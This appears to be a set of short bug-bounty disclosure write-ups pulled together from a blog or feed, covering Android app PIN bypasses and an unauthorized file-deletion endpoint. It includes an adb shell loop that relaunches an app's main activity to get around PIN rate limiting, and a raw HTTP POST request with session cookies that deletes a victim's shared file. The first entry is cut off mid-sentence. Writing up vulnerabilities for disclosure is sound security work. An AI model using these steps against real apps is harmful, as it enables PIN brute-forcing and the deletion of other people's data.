Hitting main activity multiple times app allowing to view any activity inside an app. without even entering the mobile pin.
Application has a mobile pin security. without entering the pin you cant enter into the app.
But by calling internal activities like settings.activity and notifications.activity with…
Application pin rate limiting bypass
The bug is in private program .
There is a feature to lock mobile app with pin . But only 3 attempts. If we attempt wrong pin. The app logouts.
But there is a misconfig in this feature. If you enter the pin 2 times. close the app and open the app again you will get another 3 attempts . So the rate limiting bypassed by closing and calling the main activity
You can launch the main activity as many times as you want with adb
while true;do adb shell am start -a android.intent.action.VIEW -n com.redacted/com.redacted.MainActivity;sleep 4;done
while the sleep time you can enter the pin 2 times and again the main activity will be called so you can enter pin again
Impact :- mobile auth pin rate limiting bypassed
No thanks for reading ..!
Attacker can able to delete any file with vulnerable endpoint ..!
POST /u/4/deleteShareable?appVersion=20190926_020020 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Accept: application/json, text/plain, */*
Cookie: RAP_XSRF_TOKEN=ACQ5uE-fZxoHyJIMJ6I9fWifDGZzjTeHCw:1569756166600; gh_7510439=;
guessing id here not possible . But if the victim shared his file the id will be visible in url path
September 29,2019 : Reported
Oct 1, 2019 : Triaged
Oct 8, 2019 : bountry awarded 5k$
No thanks for reading the report :-